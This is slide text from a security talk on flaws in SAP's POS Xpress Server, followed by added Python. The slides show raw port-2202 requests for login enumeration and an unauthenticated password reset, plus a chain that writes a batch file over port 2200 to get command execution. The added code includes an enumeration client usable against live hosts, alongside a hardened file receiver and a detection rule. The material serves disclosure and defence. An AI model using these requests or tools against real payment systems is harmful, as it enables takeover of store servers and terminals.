Head of security consulting at ERPScan
Introduction to POS
  Lucas Zaichkowsky, "Point of Sale System Architecture and Security"
Magstripe readers and unencrypted data
EMV chip
  Ross Anderson, "How Smartcard Payment Systems Fail"
The No-PIN attack
  Peter Fillmore, "Crash and Pay: Owning and Cloning Payment Devices"
The previous work
  Sławomir Jasek, "Hacking challenge: steal a car!"
MITM POS mobile
Conclusion
[Diagram: the payment chain. Consumers -> POS Hardware -> POS Software -> POS Backend. The backend side consists of the Payment Service Provider (PSP), the Acquirers, the credit card brand network and the Issuer.]
Business day. The beginning
[Diagram: the Manager logs in; the Store is opened on the Server; the Terminals open and get their parameters; the Cashiers start work.]

Business day. End of Day
[Diagram: the Manager logs out; the Terminals close and send their data to the Server; the Store is closed; the Cashiers finish.]
Language: C++
Components: Store Database, Store Manager, POS Client, Xpress POS Server, Store Configurator

[Diagram residue: "Map" slides for POS Client, Xpress Server, Store Manager and Store Configurator, followed by the component diagram split into PART I, PART II and PART III.]
How does it work? Part 1

File Architecture

[Diagram: Xpress POS Server <-> Store Manager on port 2202; Xpress POS Server <-> Database on port 1433, 1521, 2638, ... (MS SQL Server, Oracle, SQL Anywhere, depending on the DBMS).]

Handmade…
Help response 61
DEMO 1
BACKDOORS EVERYWHERE

Methods: 23% public, 77% private
Request and response (port 2202)

Correct password and login (Password and Login are OK):
  Request:  APM-VALIDATE-PASSWD 0 1119 1 1337;1234567a
  Response: 1119 0 1 1 Disp=Authenticated;APMCode=0;
Correct login, wrong password (Wrong Password):
  Request:  APM-VALIDATE-PASSWD 0 1119 1 1337;12345
  Response: 1119 0 1 1 Disp=Authenticated;APMCode=1;
Incorrect login (Wrong Login):
  Request:  APM-VALIDATE-PASSWD 0 1119 1 1337;12345
  Response: 1119 0 1 1 Disp=Authenticated;APMCode=10;

The APMCode alone tells a wrong password (1) apart from an unknown login (10), so the service leaks which logins exist.

Reset password: a single APM-RESET-PASSWD request sets a new password for the login, with no prior authentication exchange shown.
  Request:  APM-RESET-PASSWD 0 1119 1 1337;CHANGEDPWD1
  Response: 1119 0 1 1 Disp=Authenticated;APMCode=0;

FILE-FIND [file_path]
  Request:  FILE-FIND C:\1234.txt
  Response: 168 FILE-FIND 32 34680 19073 7 1234.txt
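The following Python is an example added by the editor, not code from the ERPScan talk or from SAP. It models the plain-text port-2202 exchange shown above (APM-VALIDATE-PASSWD and APM-RESET-PASSWD, answered by "<seq> 0 1 1 Disp=Authenticated;APMCode=<n>;") and uses the APMCode difference as a login-enumeration oracle. The request layout and the APMCode values 0/1/10 are taken from the slides; the response regex, the TCP helper, the FakeStoreManager stand-in and its user table are assumptions so that the example runs offline.

```python
import re
import socket

# APMCode values as shown on the slides.
APM_OK = 0
APM_WRONG_PASSWORD = 1
APM_WRONG_LOGIN = 10


def build_validate(seq, login, password):
    """APM-VALIDATE-PASSWD request as on the slide; the fields 0/<seq>/1 are copied verbatim."""
    return f"APM-VALIDATE-PASSWD 0 {seq} 1 {login};{password}\r\n"


def build_reset(seq, login, new_password):
    """APM-RESET-PASSWD request; same shape, the password field carries the new value."""
    return f"APM-RESET-PASSWD 0 {seq} 1 {login};{new_password}\r\n"


# Assumed grammar of the response line: "<seq> 0 1 1 Key=Value;Key=Value;".
_RESP = re.compile(r"^(?P<seq>\d+) \d+ \d+ \d+ (?P<kv>(?:\w+=[^;]*;)*)$")


def parse_response(line):
    """Parse '<seq> 0 1 1 Disp=Authenticated;APMCode=<n>;' into a dict."""
    m = _RESP.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised response: {line!r}")
    fields = dict(kv.split("=", 1) for kv in m.group("kv").split(";") if kv)
    return {"seq": int(m.group("seq")), "disp": fields.get("Disp"), "code": int(fields["APMCode"])}


def classify(code):
    """Human-readable meaning of an APMCode, per the three slide examples."""
    names = {APM_OK: "login and password OK",
             APM_WRONG_PASSWORD: "login exists, wrong password",
             APM_WRONG_LOGIN: "unknown login"}
    return names.get(code, f"unexpected APMCode {code}")


def tcp_exchange(host, request, port=2202, timeout=5.0):
    """One request/response round trip over TCP (the real transport; not used offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request.encode())
        data = b""
        while not data.endswith(b"\n"):
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return data.decode(errors="replace")


class FakeStoreManager:
    """Constructed stand-in for the port-2202 service so the example runs offline.
    It answers like the three slide examples and accepts the reset exactly as shown
    there (no authentication carried in the request)."""

    def __init__(self, users):
        self.users = dict(users)  # login -> password (constructed)

    def exchange(self, request):
        verb, _flag, seq, _one, cred = request.split(" ", 4)
        login, _, password = cred.strip().partition(";")
        if verb == "APM-VALIDATE-PASSWD":
            if login not in self.users:
                code = APM_WRONG_LOGIN
            elif self.users[login] != password:
                code = APM_WRONG_PASSWORD
            else:
                code = APM_OK
        elif verb == "APM-RESET-PASSWD":
            self.users[login] = password
            code = APM_OK
        else:
            raise ValueError(f"unknown verb {verb}")
        return f"{seq} 0 1 1 Disp=Authenticated;APMCode={code};\r\n"


def enumerate_logins(exchange, candidates, probe="x", seq=1119):
    """Login enumeration through the APMCode oracle: any answer other than
    APMCode=10 means the login exists, whatever password was sent."""
    return [c for c in candidates
            if parse_response(exchange(build_validate(seq, c, probe)))["code"] != APM_WRONG_LOGIN]
```

To run it against a real host, pass `lambda req: tcp_exchange(host, req)` as the `exchange` argument instead of `FakeStoreManager.exchange`; the parsing and the oracle logic are the same either way.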
DEMO 2
How does it work? Part 3

[Diagram: Xpress POS Server <-> POS Client on port 2200]
Message types on port 2200 (the wire byte is the ASCII letter):
  MT_FILE_BAD       42h  B
  MT_FILE_END       43h  C
  MT_DATAGRAM       44h  D
  MT_FILE_REQ_ERR   45h  E
  MT_FILE_DATA      46h  F
  MT_FILE_GOOD      47h  G
  MT_REQ_DIR        49h  I
  MT_FILE_REQ_SEND  52h  R
  MT_FILE_SEND      53h  S
  MT_UNTYPED        55h  U
  MT_SEND_CANCEL    58h  X
  MT_RESP_DIR       69h  i
  MT_RECV_CANCEL    78h  x
[Diagram: file transfer on port 2200. The sender emits F (MT_FILE_DATA) frames of the form "F Size DATA", then C (MT_FILE_END); the server writes the file and answers G (MT_FILE_GOOD).]
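The following Python is an example added by the editor, not code from the ERPScan talk or from SAP. It models the port-2200 file transfer described above (F frames carrying data, C ending the file, G or B as the server's answer) with a receiver that shows the behaviour the talk describes (any target path is written) next to a hardened receiver that confines writes to the PARM directory. The message-type letters are from the slide; the framing (1-byte type, 4-byte big-endian length, payload), the install path, the idea that the target name is agreed before the F frames, and the in-memory "disk" are assumptions.

```python
import ntpath
import struct

# Message types from the slide (the single-letter ASCII codes).
MT_FILE_BAD = 0x42   # 'B'
MT_FILE_END = 0x43   # 'C'
MT_FILE_DATA = 0x46  # 'F'
MT_FILE_GOOD = 0x47  # 'G'

# Assumption: install root as on the slide's paths, which elide the drive.
PARM_DIR = r"C:\SAP\Xpress Server\PARM"


def frame(mtype, payload=b""):
    """Assumed framing: 1-byte type, 4-byte big-endian length, payload."""
    return bytes([mtype]) + struct.pack(">I", len(payload)) + payload


def encode_upload(data, chunk=1024):
    """Sender side of the sequence on the slides: F frames, then a C frame."""
    parts = [frame(MT_FILE_DATA, data[i:i + chunk]) for i in range(0, len(data), chunk)]
    return b"".join(parts) + frame(MT_FILE_END)


def parse_frames(buf):
    """Split a byte string into (type, payload) tuples; reject truncated input."""
    frames, i = [], 0
    while i < len(buf):
        if i + 5 > len(buf):
            raise ValueError("truncated frame header")
        mtype = buf[i]
        (length,) = struct.unpack(">I", buf[i + 1:i + 5])
        payload = buf[i + 5:i + 5 + length]
        if len(payload) != length:
            raise ValueError("truncated frame payload")
        frames.append((mtype, payload))
        i += 5 + length
    return frames


def resolve(target):
    """Path the server would write: target joined to PARM_DIR (an absolute target wins, as ntpath.join does)."""
    return ntpath.normpath(ntpath.join(PARM_DIR, target))


def confined(path):
    """True only if the resolved path stays inside PARM_DIR (case-insensitive, as on Windows)."""
    root = ntpath.normpath(PARM_DIR).lower() + "\\"
    return ntpath.normpath(path).lower().startswith(root)


class Receiver:
    """Receiver state machine. confine=False reproduces what the talk describes
    (whatever target was named gets written); confine=True is the hardened form."""

    def __init__(self, fs, target, confine):
        self.fs = fs            # dict standing in for the server's disk (constructed)
        self.target = target    # assumption: file name negotiated before the F frames
        self.confine = confine
        self.buf = bytearray()

    def handle(self, wire):
        """Consume frames; answer G on a completed write, B on a refused or malformed one."""
        for mtype, payload in parse_frames(wire):
            if mtype == MT_FILE_DATA:
                self.buf += payload
            elif mtype == MT_FILE_END:
                dest = resolve(self.target)
                if self.confine and not confined(dest):
                    return bytes([MT_FILE_BAD])
                self.fs[dest] = bytes(self.buf)
                return bytes([MT_FILE_GOOD])
            else:
                return bytes([MT_FILE_BAD])
        return b""  # no C frame yet; keep buffering
```

The length check in `parse_frames` matters on the receiving side: a length field larger than the remaining bytes must be refused rather than silently producing a short payload, otherwise a later C frame could commit a partially received file. The confinement check normalises before comparing, so `..\` segments and absolute targets are both caught.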
DEMO 3
1. The Store Configurator creates config files, and the Xpress Server applies them if it finds a "newparm.trg" file in the special directory.
2. We can write any data we want to any file on the Xpress Server using port 2200.
3. POS Clients (terminals) update their parameters after opening.
4. We can close and open POS terminals using telnet on port 2202.
[Diagram: the Attacker reaches the Xpress POS Server on port 2200 and port 2202; the server talks to the POS Client and to the Database.]
[Diagram: Attacker -> Xpress Server on port 2200; directories …\SAP\Xpress Server\... and …\Xpress Server\PARM\...; the attacker keeps a listening port open.]
  2. "newparm.trg" is written (over port 2200)
  3. Xpress Server finds "newparm.trg"
  4. Xpress Server deletes "newparm.trg"
  5. Xpress Server searches for "XPSPARM.bat"
  6. Xpress Server executes "XPSPARM.bat"
  8. Any command is sent from the attacker's listening port
  9. The command is executed
(Steps 1 and 7 are not recoverable from the extracted slide.)
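The following Python is an example added by the editor, not code from the ERPScan talk or from SAP. It turns the four-point summary and the numbered sequence above into detection logic: an inbound port-2200 session from an address that is not a known terminal, followed by a write of "newparm.trg" or a .bat file under the install directory and then the Xpress Server process spawning XPSPARM.bat, yields one alert. The event schema (plain dicts with ts/kind/... keys), the process name, the install path, the terminal addresses and the sample events are all constructed; map them onto your own Sysmon or EDR fields.

```python
import ntpath

SERVER_IMAGE = "XpressServer.exe"                          # assumption: service process name
INSTALL_ROOT = ntpath.normpath(r"C:\SAP\Xpress Server")   # assumption: install root
KNOWN_POS_CLIENTS = {"10.10.1.21", "10.10.1.22"}           # constructed: terminal addresses


def in_install(path):
    """True if the path lies under the Xpress Server install directory (case-insensitive)."""
    return ntpath.normpath(path).lower().startswith(INSTALL_ROOT.lower() + "\\")


def trigger_like(path):
    """The trigger file itself, or any batch file the trigger could make the server run."""
    name = ntpath.basename(path).lower()
    return name == "newparm.trg" or name.endswith(".bat")


def detect(events, window=300):
    """Correlate: non-terminal session on 2200 -> trigger-like write under the
    install root by the server process -> server spawning XPSPARM.bat.
    Returns one alert per batch execution that follows such writes within `window` seconds."""
    sessions = {}   # src_ip -> ts of the latest inbound 2200 connection from a non-terminal
    writes = []     # (write event, [src_ips]) for writes made while such a session was fresh
    alerts = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        kind = e["kind"]
        if kind == "inbound" and e["dst_port"] == 2200 and e["src_ip"] not in KNOWN_POS_CLIENTS:
            sessions[e["src_ip"]] = e["ts"]
        elif (kind == "file_write" and e["process"] == SERVER_IMAGE
              and in_install(e["path"]) and trigger_like(e["path"])):
            srcs = [ip for ip, t in sessions.items() if 0 <= e["ts"] - t <= window]
            if srcs:
                writes.append((e, srcs))
        elif (kind == "process_create" and e["parent"] == SERVER_IMAGE
              and "xpsparm.bat" in e["cmdline"].lower()):
            recent = [(w, s) for w, s in writes if 0 <= e["ts"] - w["ts"] <= window]
            if recent:
                alerts.append({
                    "ts": e["ts"],
                    "rule": "xpress-server-parm-trigger-exec",
                    "sources": sorted({ip for _, s in recent for ip in s}),
                    "written": [w["path"] for w, _ in recent],
                    "cmdline": e["cmdline"],
                })
    return alerts


# Constructed telemetry reproducing steps 2 to 6 of the sequence on the slides.
ATTACK_EVENTS = [
    {"ts": 100, "kind": "inbound", "src_ip": "10.0.0.5", "dst_port": 2200},
    {"ts": 101, "kind": "file_write", "process": SERVER_IMAGE,
     "path": r"C:\SAP\Xpress Server\XPSPARM.bat"},
    {"ts": 102, "kind": "file_write", "process": SERVER_IMAGE,
     "path": r"C:\SAP\Xpress Server\PARM\newparm.trg"},
    {"ts": 130, "kind": "process_create", "parent": SERVER_IMAGE, "image": "cmd.exe",
     "cmdline": r'cmd.exe /c "C:\SAP\Xpress Server\XPSPARM.bat"'},
]

# Constructed benign day: a known terminal talks on 2200 and a normal parameter update runs.
BENIGN_EVENTS = [
    {"ts": 200, "kind": "inbound", "src_ip": "10.10.1.21", "dst_port": 2200},
    {"ts": 201, "kind": "file_write", "process": SERVER_IMAGE,
     "path": r"C:\SAP\Xpress Server\PARM\newparm.trg"},
    {"ts": 202, "kind": "process_create", "parent": SERVER_IMAGE, "image": "cmd.exe",
     "cmdline": r'cmd.exe /c "C:\SAP\Xpress Server\XPSPARM.bat"'},
]
```

The rule deliberately keys on the network origin rather than on the file names alone, because the Store Configurator legitimately produces the same trigger file during a parameter update; tune `KNOWN_POS_CLIENTS` and `window` to the store's real topology and update cadence.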
DEMO 4
Fixes
7th of September 2017: all SAP notes

EU: Luna ArenA, 238 Herikerbergweg, 1101 CM Amsterdam, phone +31 20 8932892
Webinars: erpscan.com/category/press-center/events/